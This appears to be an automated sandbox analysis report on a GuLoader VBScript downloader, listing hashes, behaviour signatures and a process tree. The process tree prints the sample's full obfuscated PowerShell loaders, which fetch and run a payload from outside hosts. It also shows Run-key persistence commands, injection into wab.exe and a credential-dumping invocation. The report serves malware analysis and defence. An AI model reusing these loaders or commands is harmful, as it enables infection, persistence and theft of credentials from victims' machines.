Overview

overview

10

Static

static

1

e8a3dc3bf7...f2.vbs

windows7-x64

8

e8a3dc3bf7...f2.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-07-2024 02:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e8a3dc3bf71a6dbdc2ab8beb59a9b435626d67d1596a4dc4dbfbc7c8978e74f2.vbs

  • Size

    22KB

  • MD5

    a13172a0f0e7ac4d5f957050221d7e3f

  • SHA1

    c81809f26230427879daf37de42163b1731018ad

  • SHA256

    e8a3dc3bf71a6dbdc2ab8beb59a9b435626d67d1596a4dc4dbfbc7c8978e74f2

  • SHA512

    52feaccccb0ff8973f8c7bff8f1ca450c57351978778590c67ec5bb91025aa99d8011819f315806d1f580b87883e0ab36717b2f61c913945b20685ca048f0ef2

  • SSDEEP

    384:AlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgwwP4WUUWUfLsA:0zSR022X/523S0e8xPPm+K1hmrRWK

Score
10/10
guloadercollectiondownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e8a3dc3bf71a6dbdc2ab8beb59a9b435626d67d1596a4dc4dbfbc7c8978e74f2.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4936
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Triakisoctahedron Centrifugalkrfternes Chadorer Strofers Lisys Catalogia Blodprvernes vindrosen Shantungsfrakke Dataformaters Doublehorned Legs Boomene Lakridskonfekter Forindstiller Vgterens Underskriftindsmlingens Uerfarne Blyholdigere Electively236 Casualist Adelarthrosomatous Superpowers Torgnys55 Triakisoctahedron Centrifugalkrfternes Chadorer Strofers Lisys Catalogia Blodprvernes vindrosen Shantungsfrakke Dataformaters Doublehorned Legs Boomene Lakridskonfekter Forindstiller Vgterens Underskriftindsmlingens Uerfarne Blyholdigere Electively236 Casualist Adelarthrosomatous Superpowers Torgnys55';If (${host}.CurrentCulture) {$Benzoid99++;}Function aflsningsdag($Udstyknngslov){$Epidotes=$Udstyknngslov.Length-$Benzoid99;$Ssterorganisationens='SUBsTRI';$Ssterorganisationens+='ng';For( $Abrogating=1;$Abrogating -lt $Epidotes;$Abrogating+=2){$Triakisoctahedron+=$Udstyknngslov.$Ssterorganisationens.Invoke( $Abrogating, $Benzoid99);}$Triakisoctahedron;}function Cykelturernes($Pediadontic){ & ($Klimaforandring) ($Pediadontic);}$Modificerende=aflsningsdag ',M oOzBiSl lAa /P5v.F0 P( W,i n d o,w,sr .N TK E1 0 .E0P;R .W iMnM6A4N; .x.6M4S; JrGvr:,1G2L1 .,0G)u ,GUeScRkOo /C2 0.1W0I0U1 0,1 HF iSrKeBfSo xK/M1S2F1S.Z0 ';$Propinquitatis=aflsningsdag 'UUOsSe,rA- ASg eSnUt. ';$Lisys=aflsningsdag '.h t t p sd:B/E/ e vRoBlKu xHcBo n,t.a,beiMl iPd a,d e . cAoSm,.,b,r /UJPU.L Y /FTPeMkBs tElSsRnTi n g sA1S1 8 .tj aSvLaT>.h,t tAp,sA:m/G/AeBuPr o,-Rf,i eDrW- vMeGcThUiA.MrNoL/PTUeIk,sut.l,s.nsi,n g s 1S1 8S.BjGa vRa, ';$Paracress=aflsningsdag ' >K ';$Klimaforandring=aflsningsdag ' i eBx. ';$alarmeret='vindrosen';$Giftefogeder = aflsningsdag 'HeEcSh o ,%,aMpUpMd aSt a %S\,Gfl,eMiDrS. UAn dP V& &, .e c h oS KtR ';Cykelturernes (aflsningsdag 'V$,g lPoSb,a lG: I,nSt,eDr p.e rSmDe.a.tDe,dB=.( c mRdT A/FcT S$cGDi fTt,eSf.o g e dDeAr.) ');Cykelturernes (aflsningsdag '.$Mg l o,bDaLl,: S tPrco fIe r s.=V$ L iRsLyEs .UsSpjl i,t ( $RP aHr aHc r.eAsVss)S ');Cykelturernes (aflsningsdag ' [ NAe.tB.,S esrHv,i.cNeTPIoFi,n tTM,acn aTgSe r.].:,:CSSe cSu r.iStOyRP.r,oEt oSc,oFl B= ,[ N.e tE..Spe cpuDr,iSt yKP r oDtSo cMoDl T,y p,eK] :.:DT lEsK1 2V ');$Lisys=$Strofers[0];$Abrogatingnvertedly= (aflsningsdag 'E$MgBl o bSarlA:,aOa bMn.e r = N e wS-EO,bAj e,c.t .SMyFs t e.m .SN eSt .NWHePb.C lTiPe nat');$Abrogatingnvertedly+=$Interpermeated[1];Cykelturernes ($Abrogatingnvertedly);Cykelturernes (aflsningsdag ' $Pa,aNb,n e.r .SH.e.a dUeCr s [ $.P r obpPi n qSu,iSt,aStti su] = $oMKo dMi fti cFeTr e,n dDeG ');$Mammaliferous=aflsningsdag 'b$ aSa bDn.eTr .FDMoSw n lPoLa dUFLial e ( $SL i sAyPsS, $ A dSeGl.aSr.t h rBo sFo m.aIt.oMu s ), ';$Adelarthrosomatous=$Interpermeated[0];Cykelturernes (aflsningsdag ' $pg,l,oBb,a.l :mSKu geePk oFpDp ean =b( T e,s t,-PPMaTt h. S$ APdSe lTa r t h r o,sAo,mNa thoIu,sT), ');while (!$Sugekoppen) {Cykelturernes (aflsningsdag 'P$HgPl oTbnaTl,:.SCt.a,k k eIr,=B$,t rAuAeR ') ;Cykelturernes $Mammaliferous;Cykelturernes (aflsningsdag 'RSMt aHrRt,-GSIlLe.eUp F4 ');Cykelturernes (aflsningsdag ',$,gRlOoIbBa,lD:RS u g eBk o.p pSean = ( T eks tB-,P.a,t h C$MA dReSl.a,r t h r.o sUoTmCa tBoSuFs ). ') ;Cykelturernes (aflsningsdag '.$Ug,lHo bKaHl.:bC h.a d owr eTr.= $.g lTo bSa l :,C ePnFt r i f u gPa l kIr fKt.e.r,nPe.s.+S+ % $ S tPrVo f eBrFsP.Jc o u.n tF ') ;$Lisys=$Strofers[$Chadorer];}$falskneriers=354252;$Parfumen=27076;Cykelturernes (aflsningsdag ' $ gcl oNb aIlE: SOhUaEn.tKu n,gMs,fSrOa.kNkUeC .=S SG.e tS-MCro n t.e.n tG D$.ATdSeKlpa,rJtOh r oCsGo mPaFt oSu s, ');Cykelturernes (aflsningsdag ' $ g.l o bBaAlG: ESl e kSt r o.t eSkBn iCk.eIr nHeM2E3E9U m= [MS y,s.tUe.mH. C oAnPv,eErTt ] :,:,F.rLo mRB aPsBe 6 4 S t r irn gD(K$,S h.a,nBtCu.nbg sSf r,aSkSk eF)S ');Cykelturernes (aflsningsdag 'D$ gol,oUbTa,lB:UL eFg s s=t C[RS yAs,t.e m . TPe,x.t . E n c o,dSi n gS]S:U: ATS C,I Id.SGReAtPSOtUrGi nRgF(.$.E l eDk tOr oFtBeOkSnUiGkPedr n,eD2D3 9F) ');Cykelturernes (aflsningsdag 'A$.gAllo bAaRlB: T e,r pMe.n tFiAnNh,o,l dAiSgRe.=,$EL,eTg.s . s,uHbss tHrSi n.g (A$AfKa l s kInSe rAi eGrSs,, $ PFa r fFu,mSeBn.)T ');Cykelturernes $Terpentinholdige;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1512
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Gleir.Und && echo t"
        3⤵
          PID:3440
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Triakisoctahedron Centrifugalkrfternes Chadorer Strofers Lisys Catalogia Blodprvernes vindrosen Shantungsfrakke Dataformaters Doublehorned Legs Boomene Lakridskonfekter Forindstiller Vgterens Underskriftindsmlingens Uerfarne Blyholdigere Electively236 Casualist Adelarthrosomatous Superpowers Torgnys55 Triakisoctahedron Centrifugalkrfternes Chadorer Strofers Lisys Catalogia Blodprvernes vindrosen Shantungsfrakke Dataformaters Doublehorned Legs Boomene Lakridskonfekter Forindstiller Vgterens Underskriftindsmlingens Uerfarne Blyholdigere Electively236 Casualist Adelarthrosomatous Superpowers Torgnys55';If (${host}.CurrentCulture) {$Benzoid99++;}Function aflsningsdag($Udstyknngslov){$Epidotes=$Udstyknngslov.Length-$Benzoid99;$Ssterorganisationens='SUBsTRI';$Ssterorganisationens+='ng';For( $Abrogating=1;$Abrogating -lt $Epidotes;$Abrogating+=2){$Triakisoctahedron+=$Udstyknngslov.$Ssterorganisationens.Invoke( $Abrogating, $Benzoid99);}$Triakisoctahedron;}function Cykelturernes($Pediadontic){ & ($Klimaforandring) ($Pediadontic);}$Modificerende=aflsningsdag ',M oOzBiSl lAa /P5v.F0 P( W,i n d o,w,sr .N TK E1 0 .E0P;R .W iMnM6A4N; .x.6M4S; JrGvr:,1G2L1 .,0G)u ,GUeScRkOo /C2 0.1W0I0U1 0,1 HF iSrKeBfSo xK/M1S2F1S.Z0 ';$Propinquitatis=aflsningsdag 'UUOsSe,rA- ASg eSnUt. ';$Lisys=aflsningsdag '.h t t p sd:B/E/ e vRoBlKu xHcBo n,t.a,beiMl iPd a,d e . cAoSm,.,b,r /UJPU.L Y /FTPeMkBs tElSsRnTi n g sA1S1 8 .tj aSvLaT>.h,t tAp,sA:m/G/AeBuPr o,-Rf,i eDrW- vMeGcThUiA.MrNoL/PTUeIk,sut.l,s.nsi,n g s 1S1 8S.BjGa vRa, ';$Paracress=aflsningsdag ' >K ';$Klimaforandring=aflsningsdag ' i eBx. ';$alarmeret='vindrosen';$Giftefogeder = aflsningsdag 'HeEcSh o ,%,aMpUpMd aSt a %S\,Gfl,eMiDrS. UAn dP V& &, .e c h oS KtR ';Cykelturernes (aflsningsdag 'V$,g lPoSb,a lG: I,nSt,eDr p.e rSmDe.a.tDe,dB=.( c mRdT A/FcT S$cGDi fTt,eSf.o g e dDeAr.) ');Cykelturernes (aflsningsdag '.$Mg l o,bDaLl,: S tPrco fIe r s.=V$ L iRsLyEs .UsSpjl i,t ( $RP aHr aHc r.eAsVss)S ');Cykelturernes (aflsningsdag ' [ NAe.tB.,S esrHv,i.cNeTPIoFi,n tTM,acn aTgSe r.].:,:CSSe cSu r.iStOyRP.r,oEt oSc,oFl B= ,[ N.e tE..Spe cpuDr,iSt yKP r oDtSo cMoDl T,y p,eK] :.:DT lEsK1 2V ');$Lisys=$Strofers[0];$Abrogatingnvertedly= (aflsningsdag 'E$MgBl o bSarlA:,aOa bMn.e r = N e wS-EO,bAj e,c.t .SMyFs t e.m .SN eSt .NWHePb.C lTiPe nat');$Abrogatingnvertedly+=$Interpermeated[1];Cykelturernes ($Abrogatingnvertedly);Cykelturernes (aflsningsdag ' $Pa,aNb,n e.r .SH.e.a dUeCr s [ $.P r obpPi n qSu,iSt,aStti su] = $oMKo dMi fti cFeTr e,n dDeG ');$Mammaliferous=aflsningsdag 'b$ aSa bDn.eTr .FDMoSw n lPoLa dUFLial e ( $SL i sAyPsS, $ A dSeGl.aSr.t h rBo sFo m.aIt.oMu s ), ';$Adelarthrosomatous=$Interpermeated[0];Cykelturernes (aflsningsdag ' $pg,l,oBb,a.l :mSKu geePk oFpDp ean =b( T e,s t,-PPMaTt h. S$ APdSe lTa r t h r o,sAo,mNa thoIu,sT), ');while (!$Sugekoppen) {Cykelturernes (aflsningsdag 'P$HgPl oTbnaTl,:.SCt.a,k k eIr,=B$,t rAuAeR ') ;Cykelturernes $Mammaliferous;Cykelturernes (aflsningsdag 'RSMt aHrRt,-GSIlLe.eUp F4 ');Cykelturernes (aflsningsdag ',$,gRlOoIbBa,lD:RS u g eBk o.p pSean = ( T eks tB-,P.a,t h C$MA dReSl.a,r t h r.o sUoTmCa tBoSuFs ). ') ;Cykelturernes (aflsningsdag '.$Ug,lHo bKaHl.:bC h.a d owr eTr.= $.g lTo bSa l :,C ePnFt r i f u gPa l kIr fKt.e.r,nPe.s.+S+ % $ S tPrVo f eBrFsP.Jc o u.n tF ') ;$Lisys=$Strofers[$Chadorer];}$falskneriers=354252;$Parfumen=27076;Cykelturernes (aflsningsdag ' $ gcl oNb aIlE: SOhUaEn.tKu n,gMs,fSrOa.kNkUeC .=S SG.e tS-MCro n t.e.n tG D$.ATdSeKlpa,rJtOh r oCsGo mPaFt oSu s, ');Cykelturernes (aflsningsdag ' $ g.l o bBaAlG: ESl e kSt r o.t eSkBn iCk.eIr nHeM2E3E9U m= [MS y,s.tUe.mH. C oAnPv,eErTt ] :,:,F.rLo mRB aPsBe 6 4 S t r irn gD(K$,S h.a,nBtCu.nbg sSf r,aSkSk eF)S ');Cykelturernes (aflsningsdag 'D$ gol,oUbTa,lB:UL eFg s s=t C[RS yAs,t.e m . TPe,x.t . E n c o,dSi n gS]S:U: ATS C,I Id.SGReAtPSOtUrGi nRgF(.$.E l eDk tOr oFtBeOkSnUiGkPedr n,eD2D3 9F) ');Cykelturernes (aflsningsdag 'A$.gAllo bAaRlB: T e,r pMe.n tFiAnNh,o,l dAiSgRe.=,$EL,eTg.s . s,uHbss tHrSi n.g (A$AfKa l s kInSe rAi eGrSs,, $ PFa r fFu,mSeBn.)T ');Cykelturernes $Terpentinholdige;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4596
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Gleir.Und && echo t"
            4⤵
              PID:3528
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Modifies registry class
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3536
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemander" /t REG_EXPAND_SZ /d "%Maximized250% -w 1 $Perimyelitis=(Get-ItemProperty -Path 'HKCU:\Koncessionshaverens\').Logoernes;%Maximized250% ($Perimyelitis)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4560
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemander" /t REG_EXPAND_SZ /d "%Maximized250% -w 1 $Perimyelitis=(Get-ItemProperty -Path 'HKCU:\Koncessionshaverens\').Logoernes;%Maximized250% ($Perimyelitis)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:3836
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Poodle.vbs"
                5⤵
                • Blocklisted process makes network request
                • Checks computer location settings
                • Suspicious use of WriteProcessMemory
                PID:3892
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"
                  6⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4824
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"
                    7⤵
                      PID:2804
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"
                      7⤵
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:1080
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"
                        8⤵
                          PID:4436
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe"
                          8⤵
                          • Suspicious use of NtCreateThreadExHideFromDebugger
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:636
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"
                            9⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1344
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"
                              10⤵
                              • Adds Run key to start application
                              • Modifies registry key
                              PID:888
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\haaqnalptigzrjavjswrf"
